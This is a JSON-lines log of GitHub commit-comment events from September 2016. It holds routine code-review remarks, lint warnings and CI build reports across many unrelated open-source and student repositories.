{"id":"4598678113","type":"CommitCommentEvent","actor":{"login":"pitu7dg"},"repo":{"name":"EwaPerzanowska/learning-sass"},"payload":{"comment":{"id":19120017,"position":4,"line":4,"path":".gitignore","commit_id":"1b4cfbffb05eccc553ec0967cd0de235b8d22dd1","created_at":"2016-09-21T20:19:24Z","updated_at":"2016-09-21T20:19:24Z","body":"zmień na images/build\r\na poza tym usuń folder build u siebie na komputerze\r\n\r\njak wpiszesz git status to powinno być `deleted: images/build`\r\nzrób commit z tymi zmianami i potem będzie jak trzeba"}},"created_at":"2016-09-21T20:19:24Z"}
{"id":"4598678968","type":"CommitCommentEvent","actor":{"login":"santaclauss"},"repo":{"name":"Datatekniikka/TaistoCMS"},"payload":{"comment":{"id":19120021,"position":6,"line":13,"path":"database.sql","commit_id":"4518983add7d95d75176bc855517740c6838ce6a","created_at":"2016-09-21T20:19:34Z","updated_at":"2016-09-21T20:19:34Z","body":"1.0.2"}},"created_at":"2016-09-21T20:19:34Z"}
{"id":"4598680085","type":"CommitCommentEvent","actor":{"login":"santaclauss"},"repo":{"name":"Datatekniikka/TaistoCMS"},"payload":{"comment":{"id":19120028,"position":6,"line":13,"path":"database.sql","commit_id":"4518983add7d95d75176bc855517740c6838ce6a","created_at":"2016-09-21T20:19:47Z","updated_at":"2016-09-21T20:19:47Z","body":"7004"}},"created_at":"2016-09-21T20:19:47Z"}
{"id":"4598689459","type":"CommitCommentEvent","actor":{"login":"terminalmage"},"repo":{"name":"terminalmage/salt"},"payload":{"comment":{"id":19120049,"position":null,"line":null,"path":null,"commit_id":"f237fe4d528efd621e1f9adbeb149695e94e65a1","created_at":"2016-09-21T20:21:30Z","updated_at":"2016-09-21T20:21:30Z","body":">If population of __opts__['abc'] will always exist and is check that it is an int, then it makes sense to remove the checking. If it does do this, it would be nice if population of __opts__ also had file and dir type to check they are valid for the target platform, then more code could be removed.\r\n\r\n\r\n\r\nL425 refresh = Logic Change to just force vs \r\n(force and (expired_min == 0 or repo_age_sec < expired_min))\r\nexpired_min is their because a refresh is a very expensive operation, and some of the code forces a refresh. expired_min this give the user a option to increase performance of their runs by ignoring the force=True. If I had a large number of sls files I would be setting min to 10 minutes, but it needs to default to 0 so it acts like old versions. Call pkg.refresh_db still allows the refresh to happen for users who choose to use expire_min, while debugging sls files. With expired_min set running a state twice in a row would be a lot quicker, or someone who ran one state followed by another separate state.\r\n\r\nAre you referring to this (from the original code)?\r\n\r\n```python\r\ntry:\r\n    expired_min = int(__opts__['winrepo_cache_expire_min'])\r\nexcept ValueError:\r\n    pass\r\n```\r\n\r\nFirstly, since you added default values for these in c0798c1, we can guarantee that they will be populated in the opts dict, because the values in ``DEFAULT_MINION_OPTS`` populate the ``__opts__`` dict when the minion config file is read. With respect to us not enforcing that the type is an integer, the minion will not do that when it starts, but it will log a warning/error in the minion log saying that the types don't match. I didn't want to silently fall back (like the original code did), so I guess the question becomes this: do we want to fallback with an error in the log, or raise an exception and abort the refresh. @UtahDave @damon-atkins what do you think?\r\n\r\n>L430 Logic change on debug message which was to indicate an possible issue with the code or use. Change to log more often but not indicate an issue. I was trying to not over log, but point out a possible issue at the same time. Some respects the 60 sec was a bit small, as a typical install would take over a minute. I don't mind either way. And also original I was not going to fix state/pkg.py forcing a refresh all the time, as I was trying it as it effects more than one platform. Since I have fixed state/pkg.py it also reduces the need to point out the issue.\r\n\r\nMy updating logging displays the age of the file no matter what, so I considered it a compromise. Are you satisfied with it?\r\n\r\n>L444 - L448 No return True if the refresh_db worked without errors. Come from a background of believing all functions should return something. Also makes it easier to write tests.\r\n\r\n```python\r\nresults = refresh_db(saltenv=saltenv, verbose=False, failhard=failhard)\r\ntry:\r\n    return not bool(results.get('failed', 0))\r\nexcept AttributeError:\r\n    return False\r\n```\r\n\r\nNo, it is returning ``True`` if there were no errors. It's returning ``not bool(results.get('failed', 0))``. If ``failed == 1``, then there was 1 failure, and ``not bool(1)`` is ``False``. No errors mean ``not bool(0)``, which is ``True``. I'll admit this usage is probably too clever and could use some logging to clarify it."}},"created_at":"2016-09-21T20:21:30Z"}
{"id":"4598690448","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"seninp-bioinfo/MetaComp"},"payload":{"comment":{"id":19120054,"position":null,"line":null,"path":null,"commit_id":"5599125302272d8fa7534e7dbcf6f7def2eec730","created_at":"2016-09-21T20:21:40Z","updated_at":"2016-09-21T20:21:40Z","body":"[tests/testthat/test_convert_to_otu_table.R:21:22:](https://github.com/seninp-bioinfo/MetaComp/blob/5599125302272d8fa7534e7dbcf6f7def2eec730/tests/testthat/test_convert_to_otu_table.R#L21) *style:* **Commas should always have a space after.**\n```r\n​expect_that(sum(dat[,1]), equals(1.0))\n                     ^\n```\n[tests/testthat/test_convert_to_otu_table.R:26:2:](https://github.com/seninp-bioinfo/MetaComp/blob/5599125302272d8fa7534e7dbcf6f7def2eec730/tests/testthat/test_convert_to_otu_table.R#L26) *style:* **Commented code should be removed.**\n```r\n​#expect_that(convert_merge_table_to_phyloseq_otu_table(\"../test_data/nonexistantfile.txt\", \"class\"), throws_error())\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test_convert_to_otu_table.R:27:1:](https://github.com/seninp-bioinfo/MetaComp/blob/5599125302272d8fa7534e7dbcf6f7def2eec730/tests/testthat/test_convert_to_otu_table.R#L27) *style:* **lines should not be more than 100 characters.**\n```r\n​expect_that(convert_to_otu_table(\"../test_data/merged_table.tsv\", \"non_existent_taxa_level\"), throws_error())\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-21T20:21:40Z"}
{"id":"4598696291","type":"CommitCommentEvent","actor":{"login":"severinemartini"},"repo":{"name":"severinemartini/severinemartini"},"payload":{"comment":{"id":19120067,"position":1,"line":1,"path":"README.md","commit_id":"e7d4b7c7031cdea0d101fea168dab83fff0a3cad","created_at":"2016-09-21T20:22:43Z","updated_at":"2016-09-21T20:22:43Z","body":"This is  a test repository"}},"created_at":"2016-09-21T20:22:43Z"}
{"id":"4598698509","type":"CommitCommentEvent","actor":{"login":"Toilal"},"repo":{"name":"FluentLenium/FluentLenium"},"payload":{"comment":{"id":19120071,"position":null,"line":null,"path":null,"commit_id":"56399cc583d84cdca6bc26a61dd226261b71ce02","created_at":"2016-09-21T20:23:08Z","updated_at":"2016-09-21T20:23:08Z","body":"I think it could have been done in Component class, using lombok @Delegates and with more methods from FluentControl. "}},"created_at":"2016-09-21T20:23:08Z"}
{"id":"4598698572","type":"CommitCommentEvent","actor":{"login":"santaclauss"},"repo":{"name":"santaclauss/TaistoCMS"},"payload":{"comment":{"id":19120072,"position":2,"line":12,"path":"mysql.php","commit_id":"4e23c780edbfcd650d9cf384faf81a477dcf1d3a","created_at":"2016-09-21T20:23:09Z","updated_at":"2016-09-21T20:23:09Z","body":"SQL"}},"created_at":"2016-09-21T20:23:09Z"}
{"id":"4598699462","type":"CommitCommentEvent","actor":{"login":"severinemartini"},"repo":{"name":"severinemartini/severinemartini"},"payload":{"comment":{"id":19120073,"position":null,"line":null,"path":null,"commit_id":"e7d4b7c7031cdea0d101fea168dab83fff0a3cad","created_at":"2016-09-21T20:23:17Z","updated_at":"2016-09-21T20:23:17Z","body":"This is a test README"}},"created_at":"2016-09-21T20:23:17Z"}
{"id":"4598705188","type":"CommitCommentEvent","actor":{"login":"electrum"},"repo":{"name":"cberner/presto"},"payload":{"comment":{"id":19120090,"position":8,"line":8,"path":"presto-docs/src/main/sphinx/release/release-0.152.2.rst","commit_id":"2e7a18371c10952b142a950e137436ae7b76c463","created_at":"2016-09-21T20:24:21Z","updated_at":"2016-09-21T20:24:21Z","body":"This should go in Hive changes"}},"created_at":"2016-09-21T20:24:21Z"}
{"id":"4598709311","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19120098,"position":null,"line":null,"path":null,"commit_id":"5822760f472a91651701acce2fce3fa92fe6a3f5","created_at":"2016-09-21T20:25:07Z","updated_at":"2016-09-21T20:25:07Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1194 of 1194 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5822760f472a91651701acce2fce3fa92fe6a3f5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5822760f472a91651701acce2fce3fa92fe6a3f5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5822760f472a91651701acce2fce3fa92fe6a3f5-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.12%25-green.svg)</a>\n"}},"created_at":"2016-09-21T20:25:07Z"}
{"id":"4598711643","type":"CommitCommentEvent","actor":{"login":"andy5995"},"repo":{"name":"andy5995/blitzed-irc-trivia"},"payload":{"comment":{"id":19120102,"position":null,"line":null,"path":null,"commit_id":"8eba117c9f579cc67c560b38e6e15f6594d274b9","created_at":"2016-09-21T20:25:31Z","updated_at":"2016-09-21T20:25:31Z","body":"This fixes #13 "}},"created_at":"2016-09-21T20:25:31Z"}
{"id":"4598713790","type":"CommitCommentEvent","actor":{"login":"sjschmidt44"},"repo":{"name":"thomasxmartinez/guessing_game-repos"},"payload":{"comment":{"id":19120108,"position":55,"line":55,"path":"app.js","commit_id":"8767e6c95c94ef90b33944ad4ec65dc4fe34bbfc","created_at":"2016-09-21T20:25:54Z","updated_at":"2016-09-21T20:25:54Z","body":"Just copying your code over here so I can format it and give you some comments. \r\n```javascript\r\nvar answerSeven = prompt('What came first the ------- or the ---?').toLowerCase();\r\nvar saidArray = ['chicken','egg','rhinocerous'];\r\n\r\nif (saidArray.indexOf(answerSeven) === -1) {\r\n  alert('I didn\\'t necessarily expect you to get this' );\r\n} else {\r\n  alert('stop reading my mind');\r\n}\r\n\r\nvar myNumber = 9;\r\n\r\ndo {\r\n  console.log(myNumber);\r\n  var answerEight = prompt('Pick a number 1 through 10');\r\n  \r\n  if (answerEight < myNumber) {\r\n    alert('too low');\r\n  } else if (answerEight > myNumber) { \r\n    alert('too high');\r\n  } else {\r\n    alert('got em coach');\r\n  }\r\n} while (answerEight != myNumber);\r\n```"}},"created_at":"2016-09-21T20:25:54Z"}
{"id":"4598716120","type":"CommitCommentEvent","actor":{"login":"andy5995"},"repo":{"name":"andy5995/blitzed-irc-trivia"},"payload":{"comment":{"id":19120110,"position":4,"line":17,"path":"TODO","commit_id":"8eba117c9f579cc67c560b38e6e15f6594d274b9","created_at":"2016-09-21T20:26:21Z","updated_at":"2016-09-21T20:26:21Z","body":"removed. Any player can .start the game now (previous commit) using '.start'"}},"created_at":"2016-09-21T20:26:21Z"}
{"id":"4598716737","type":"CommitCommentEvent","actor":{"login":"garbear"},"repo":{"name":"kodi-game/game.libretro"},"payload":{"comment":{"id":19120113,"position":5,"line":8,"path":"game.libretro/addon.xml.in","commit_id":"b9603eb1e3eb98ca917280ea23ad3ec13f1c9e6a","created_at":"2016-09-21T20:26:29Z","updated_at":"2016-09-21T20:26:29Z","body":"Rotation was added in v1.0.23 when I was working against 17 alpha 1.\r\n\r\nSee:\r\n\r\n* 17alpha1 changes: https://github.com/garbear/xbmc/commits/retroplayer-17alpha1/xbmc/addons/kodi-addon-dev-kit/include/kodi/kodi_game_types.h\r\n* 17alpha2 changes: https://github.com/garbear/xbmc/commits/retroplayer-17alpha2/xbmc/addons/kodi-addon-dev-kit/include/kodi/kodi_game_types.h\r\n\r\nif it's missing for you, then you weren't rebased on an actual development branch"}},"created_at":"2016-09-21T20:26:29Z"}
{"id":"4598716853","type":"CommitCommentEvent","actor":{"login":"jawshooah"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":19120115,"position":6,"line":107,"path":"Library/Homebrew/cask/lib/hbc/dsl.rb","commit_id":"bcf6c6e36d156ea96eb254605f292a99477199ff","created_at":"2016-09-21T20:26:29Z","updated_at":"2016-09-21T20:26:29Z","body":"The line that defined `string_or_regex` above was deleted"}},"created_at":"2016-09-21T20:26:29Z"}
{"id":"4598719592","type":"CommitCommentEvent","actor":{"login":"sjschmidt44"},"repo":{"name":"thomasxmartinez/guessing_game-repos"},"payload":{"comment":{"id":19120122,"position":55,"line":55,"path":"app.js","commit_id":"8767e6c95c94ef90b33944ad4ec65dc4fe34bbfc","created_at":"2016-09-21T20:27:00Z","updated_at":"2016-09-21T20:27:00Z","body":"Overall looks good! "}},"created_at":"2016-09-21T20:27:00Z"}
{"id":"4598720945","type":"CommitCommentEvent","actor":{"login":"Disiuze"},"repo":{"name":"Makuta-Miras/The-Enclave"},"payload":{"comment":{"id":19120125,"position":null,"line":null,"path":null,"commit_id":"65389fb132d6f05da1e05fbfeb1d404c15098dfb","created_at":"2016-09-21T20:27:15Z","updated_at":"2016-09-21T20:27:15Z","body":"COMMENT PRAISING YOU FIR YOUR WORK"}},"created_at":"2016-09-21T20:27:15Z"}
{"id":"4598721278","type":"CommitCommentEvent","actor":{"login":"hacdias"},"repo":{"name":"upframe/fest.upframe.xyz"},"payload":{"comment":{"id":19120128,"position":null,"line":null,"path":null,"commit_id":"45dfcbcd47ac3ca0b89d48268bc4a6ab1672355c","created_at":"2016-09-21T20:27:19Z","updated_at":"2016-09-21T20:27:19Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;9TaoMCqz&#x2F;46-bo-add-next-previous-page-link\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> BO: Add next&#x2F;previous page link</a>"}},"created_at":"2016-09-21T20:27:19Z"}
{"id":"4598722386","type":"CommitCommentEvent","actor":{"login":"pierre"},"repo":{"name":"killbill/killbill-adyen-plugin"},"payload":{"comment":{"id":19120132,"position":null,"line":null,"path":null,"commit_id":"7679e0863ba46a05f73bd71968f419d500a7953d","created_at":"2016-09-21T20:27:31Z","updated_at":"2016-09-21T20:27:31Z","body":"cc @andrenpaes "}},"created_at":"2016-09-21T20:27:31Z"}
{"id":"4598724816","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill-adyen-plugin"},"payload":{"comment":{"id":19120135,"position":null,"line":null,"path":null,"commit_id":"7679e0863ba46a05f73bd71968f419d500a7953d","created_at":"2016-09-21T20:27:59Z","updated_at":"2016-09-21T20:27:59Z","body":"👍 "}},"created_at":"2016-09-21T20:27:59Z"}
{"id":"4598725196","type":"CommitCommentEvent","actor":{"login":"rburkey2005"},"repo":{"name":"mattcarberry/virtualagc"},"payload":{"comment":{"id":19120139,"position":125,"line":149,"path":"Aurora12/ASCENT_INERTIA_UPDATER.agc","commit_id":"fc9be773b8f6adf536a6822209f3a09847d857b4","created_at":"2016-09-21T20:28:03Z","updated_at":"2016-09-21T20:28:03Z","body":"Oops!  Couldn't see that for looking!  My apologies.  My opinion would be that if there's no actual ASCII equivalent, it probably should be changed for intent as was suggested, and / is the obvious choice.  And then I personally would add a second comment (say, above it), with my initials, the date, and in upper/lower case -- something that makes it clear that the new comment is itself new -- explaining what had happened.  That's to keep somebody else from coming along later and fixing it the opposite way.\r\n"}},"created_at":"2016-09-21T20:28:03Z"}
{"id":"4598728062","type":"CommitCommentEvent","actor":{"login":"andrenpaes"},"repo":{"name":"killbill/killbill-adyen-plugin"},"payload":{"comment":{"id":19120147,"position":null,"line":null,"path":null,"commit_id":"7679e0863ba46a05f73bd71968f419d500a7953d","created_at":"2016-09-21T20:28:36Z","updated_at":"2016-09-21T20:28:36Z","body":"👍 "}},"created_at":"2016-09-21T20:28:36Z"}
{"id":"4598730704","type":"CommitCommentEvent","actor":{"login":"SvenRoederer"},"repo":{"name":"freifunk-berlin/firmware"},"payload":{"comment":{"id":19120156,"position":null,"line":null,"path":null,"commit_id":"25c5e4409a4af3a5eaa2cefe6b28d4c9d02b00a0","created_at":"2016-09-21T20:29:06Z","updated_at":"2016-09-21T20:29:06Z","body":"or even replace this by a link to the wiki-page.\r\nSo there is only one place to change and the location is always up-to-date (independent from Firmware-release)"}},"created_at":"2016-09-21T20:29:06Z"}
{"id":"4598739671","type":"CommitCommentEvent","actor":{"login":"FantasticJoel"},"repo":{"name":"wiiudev/pyGecko"},"payload":{"comment":{"id":19120182,"position":14,"line":13,"path":"colors.py","commit_id":"cf466623fee37e9500ce13ce7494c83a4c9885b1","created_at":"2016-09-21T20:30:45Z","updated_at":"2016-09-21T20:30:45Z","body":"(\"192.168.0.18\")\r\n"}},"created_at":"2016-09-21T20:30:45Z"}
{"id":"4598740967","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"spencerlyon2/PlotlyJS.jl"},"payload":{"comment":{"id":19120187,"position":null,"line":null,"path":null,"commit_id":"f15991fd302781e377752a9c76ff19293e284a66","created_at":"2016-09-21T20:30:58Z","updated_at":"2016-09-21T20:30:58Z","body":"is mac not worth testing?"}},"created_at":"2016-09-21T20:30:58Z"}
{"id":"4598748247","type":"CommitCommentEvent","actor":{"login":"spencerlyon2"},"repo":{"name":"spencerlyon2/PlotlyJS.jl"},"payload":{"comment":{"id":19120204,"position":null,"line":null,"path":null,"commit_id":"f15991fd302781e377752a9c76ff19293e284a66","created_at":"2016-09-21T20:32:16Z","updated_at":"2016-09-21T20:32:16Z","body":"I don't do anything OS specific in my tests -- I only test pure Julia bits.\r\n\r\nI think the only benefit would be to see if my dependencies install on OS X also. Ultimately that burden should be on the other packages.\r\n\r\nDo people usually keep it on even if the code they are testing isn't platform specific?"}},"created_at":"2016-09-21T20:32:16Z"}
{"id":"4598752318","type":"CommitCommentEvent","actor":{"login":"reitermarkus"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":19120221,"position":6,"line":107,"path":"Library/Homebrew/cask/lib/hbc/dsl.rb","commit_id":"bcf6c6e36d156ea96eb254605f292a99477199ff","created_at":"2016-09-21T20:33:01Z","updated_at":"2016-09-21T20:33:01Z","body":"Just pushed another commit."}},"created_at":"2016-09-21T20:33:01Z"}
{"id":"4598754850","type":"CommitCommentEvent","actor":{"login":"denys-potapov"},"repo":{"name":"chmen/scharwerk"},"payload":{"comment":{"id":19120233,"position":null,"line":null,"path":null,"commit_id":"74930c2d8574985121b45b39579966b4b3e02c75","created_at":"2016-09-21T20:33:30Z","updated_at":"2016-09-21T20:33:30Z","body":"gem 'annotate' должно быть в дев секции гемфайла."}},"created_at":"2016-09-21T20:33:30Z"}
{"id":"4598756496","type":"CommitCommentEvent","actor":{"login":"tmaurer13"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19120235,"position":32,"line":71,"path":"equaldigit.py","commit_id":"2c945cdc9e0db59f600b4f7d5afc7bcdc15b7960","created_at":"2016-09-21T20:33:46Z","updated_at":"2016-09-21T20:33:46Z","body":"Why does the probability calculation for RTS include a binom.pdf, but none of the others do?"}},"created_at":"2016-09-21T20:33:46Z"}
{"id":"4598761484","type":"CommitCommentEvent","actor":{"login":"ewiseblatt"},"repo":{"name":"google/citest"},"payload":{"comment":{"id":19120245,"position":8,"line":138,"path":"spinnaker/spinnaker_system/google_http_lb_upsert_scenario.py","commit_id":"9f25bf6b5e9ae9b013d50de465383861c61dc31e","created_at":"2016-09-21T20:34:40Z","updated_at":"2016-09-21T20:34:40Z","body":"This is applicable in the tests too. When you create the certs, you are creating them in the wrong project. It isnt the GCE_PROJECT (which is the project spinnaker is in) but the project your deploying the resources into."}},"created_at":"2016-09-21T20:34:40Z"}
{"id":"4598766638","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"spencerlyon2/PlotlyJS.jl"},"payload":{"comment":{"id":19120252,"position":null,"line":null,"path":null,"commit_id":"f15991fd302781e377752a9c76ff19293e284a66","created_at":"2016-09-21T20:35:31Z","updated_at":"2016-09-21T20:35:31Z","body":"There's \"should be\" platform independent vs what actually happens. And your tests probably exercise somewhat different coverage of your dependencies than those dependencies' own tests, though that can often be improved by adding tests to them. If you're not annoyed by the queue, I'd usually leave it on."}},"created_at":"2016-09-21T20:35:31Z"}
{"id":"4598770474","type":"CommitCommentEvent","actor":{"login":"spencerlyon2"},"repo":{"name":"spencerlyon2/PlotlyJS.jl"},"payload":{"comment":{"id":19120263,"position":null,"line":null,"path":null,"commit_id":"f15991fd302781e377752a9c76ff19293e284a66","created_at":"2016-09-21T20:36:13Z","updated_at":"2016-09-21T20:36:13Z","body":"Ok cool.\r\n\r\nI don't push here quite enough for the queue to bother me that much. I'll flip it back on."}},"created_at":"2016-09-21T20:36:13Z"}
{"id":"4598771837","type":"CommitCommentEvent","actor":{"login":"a1rwulf"},"repo":{"name":"kodi-game/game.libretro"},"payload":{"comment":{"id":19120266,"position":5,"line":8,"path":"game.libretro/addon.xml.in","commit_id":"b9603eb1e3eb98ca917280ea23ad3ec13f1c9e6a","created_at":"2016-09-21T20:36:27Z","updated_at":"2016-09-21T20:36:27Z","body":"Seems to be the case - I screwed up somehow getting a v25 with half roation.\nThx for the help.\n\nGarrett Brown <notifications@github.com> schrieb am Mi., 21. Sep. 2016 um\n22:26 Uhr:\n\n> Rotation was added in v1.0.23 when I was working against 17 alpha 1.\n>\n> See:\n>\n>    - 17alpha1 changes:\n>    https://github.com/garbear/xbmc/commits/retroplayer-17alpha1/xbmc/addons/kodi-addon-dev-kit/include/kodi/kodi_game_types.h\n>    - 17alpha2 changes:\n>    https://github.com/garbear/xbmc/commits/retroplayer-17alpha2/xbmc/addons/kodi-addon-dev-kit/include/kodi/kodi_game_types.h\n>\n> if it's missing for you, then you weren't rebased on an actual development\n> branch\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/kodi-game/game.libretro/commit/b9603eb1e3eb98ca917280ea23ad3ec13f1c9e6a#commitcomment-19120113>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AE5zCTYpeecDLApZ7HznykyVSsA-K47Iks5qsZL1gaJpZM4KC7Cd>\n> .\n>\n"}},"created_at":"2016-09-21T20:36:27Z"}
{"id":"4598775740","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19120273,"position":null,"line":null,"path":null,"commit_id":"74433cbb8e22190e75620292ea1cca2461d1dac0","created_at":"2016-09-21T20:37:10Z","updated_at":"2016-09-21T20:37:10Z","body":"update_standards_gem (asparke2) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2362 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-74433cbb8e22190e75620292ea1cca2461d1dac0-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-74433cbb8e22190e75620292ea1cca2461d1dac0-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.49%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T20:37:10Z"}
{"id":"4598777425","type":"CommitCommentEvent","actor":{"login":"wincent"},"repo":{"name":"facebook/relay"},"payload":{"comment":{"id":19120279,"position":null,"line":null,"path":null,"commit_id":"ba05332044ab8e68890f63a875514211ee480908","created_at":"2016-09-21T20:37:29Z","updated_at":"2016-09-21T20:37:29Z","body":"Can you use UUIDs instead, @taion? Those wouldn't conflict. "}},"created_at":"2016-09-21T20:37:29Z"}
{"id":"4598779083","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19120285,"position":null,"line":null,"path":null,"commit_id":"05866ee3ce0d9d6c8c62742664da6955b9d88932","created_at":"2016-09-21T20:37:49Z","updated_at":"2016-09-21T20:37:49Z","body":"fast-forwarding develop-2.2 to borshop-integration-1484-feature-bjs-lager3.2.1 = 458fe0de"}},"created_at":"2016-09-21T20:37:49Z"}
{"id":"4598780047","type":"CommitCommentEvent","actor":{"login":"cblant20"},"repo":{"name":"yuri13/bloc-jams2"},"payload":{"comment":{"id":19120288,"position":17,"line":14,"path":"index.html","commit_id":"9f005053d53194fd38a8092dd7969a97498ddb44","created_at":"2016-09-21T20:37:59Z","updated_at":"2016-09-21T20:37:59Z","body":"This section should be named semantically"}},"created_at":"2016-09-21T20:37:59Z"}
{"id":"4598780795","type":"CommitCommentEvent","actor":{"login":"kpamnany"},"repo":{"name":"jeff-regier/Celeste.jl"},"payload":{"comment":{"id":19120293,"position":4,"line":192,"path":"src/source_division_inference.jl","commit_id":"0c69e48646808440430563a52c44542fbcf0fe7f","created_at":"2016-09-21T20:38:08Z","updated_at":"2016-09-21T20:38:08Z","body":"Ugh. Let me re-test before you waste more time."}},"created_at":"2016-09-21T20:38:08Z"}
{"id":"4598783850","type":"CommitCommentEvent","actor":{"login":"CleoQc"},"repo":{"name":"CleoQc/GoPiGo"},"payload":{"comment":{"id":19120303,"position":6,"line":175,"path":"Software/Python/gopigo.py","commit_id":"00327b61ff0e5819f9fb2914594ce06299e83fc9","created_at":"2016-09-21T20:38:38Z","updated_at":"2016-09-21T20:38:38Z","body":"this makes a synonym for the fwd() function. Much easier to explain to kids\r\n"}},"created_at":"2016-09-21T20:38:38Z"}
{"id":"4598784032","type":"CommitCommentEvent","actor":{"login":"alyosha-tas"},"repo":{"name":"TASVideos/BizHawk"},"payload":{"comment":{"id":19120304,"position":null,"line":null,"path":null,"commit_id":"955fbd0508d57fc20cd849321a27c8e4120d5067","created_at":"2016-09-21T20:38:40Z","updated_at":"2016-09-21T20:38:40Z","body":"Actually this combined with the other timing fix from commit 2843b4c fixes golden 5 and now works properly."}},"created_at":"2016-09-21T20:38:40Z"}
{"id":"4598784065","type":"CommitCommentEvent","actor":{"login":"megax"},"repo":{"name":"numixproject/numix-gtk-theme"},"payload":{"comment":{"id":19120305,"position":15,"line":23,"path":"src/gtk-3.20/scss/apps/_xfce.scss","commit_id":"3dc0bbe8189b4792f8a09e582bcf9816e438395b","created_at":"2016-09-21T20:38:41Z","updated_at":"2016-09-21T20:38:41Z","body":"@lots0logs Adding code: `menu { -gtk-image-effect: none; }` ?\r\nhttps://github.com/shimmerproject/Greybird/blob/master/gtk-3.0/_xfce.scss#L50"}},"created_at":"2016-09-21T20:38:41Z"}
{"id":"4598784492","type":"CommitCommentEvent","actor":{"login":"kpamnany"},"repo":{"name":"jeff-regier/Celeste.jl"},"payload":{"comment":{"id":19120307,"position":37,"line":230,"path":"src/source_division_inference.jl","commit_id":"0c69e48646808440430563a52c44542fbcf0fe7f","created_at":"2016-09-21T20:38:46Z","updated_at":"2016-09-21T20:38:46Z","body":"You need the ``serialize`` branch of Garbo.jl."}},"created_at":"2016-09-21T20:38:46Z"}
{"id":"4598786047","type":"CommitCommentEvent","actor":{"login":"CleoQc"},"repo":{"name":"CleoQc/GoPiGo"},"payload":{"comment":{"id":19120311,"position":15,"line":186,"path":"Software/Python/gopigo.py","commit_id":"00327b61ff0e5819f9fb2914594ce06299e83fc9","created_at":"2016-09-21T20:39:01Z","updated_at":"2016-09-21T20:39:01Z","body":"same thing here, create a synonym for the bwd() function"}},"created_at":"2016-09-21T20:39:01Z"}
{"id":"4598789046","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19120315,"position":null,"line":null,"path":null,"commit_id":"f5187ab487a2800e3ad7e78d357847c3de345143","created_at":"2016-09-21T20:39:30Z","updated_at":"2016-09-21T20:39:30Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (RKStrand) - x86_64-MacOS-10.9-clang: OK (2330 of 2334 tests passed, 8 test warnings)\n\n * 7 tests had: EIO diffs.\n * 8 tests had: ESO small diffs.\n * 4 tests had: ESO big diffs.\n * 1 test had: AUD diffs.\n * 1 test had: MTD diffs.\n * 1 test had: MTR big diffs.\n * 1 test had: RDD diffs.\n * 2 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n * 1 test had: SSZ small diffs.\n * 1 test had: ZSZ small diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: Table small diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f5187ab487a2800e3ad7e78d357847c3de345143-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f5187ab487a2800e3ad7e78d357847c3de345143-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.83%25-yellow.svg)</a> \n"}},"created_at":"2016-09-21T20:39:30Z"}
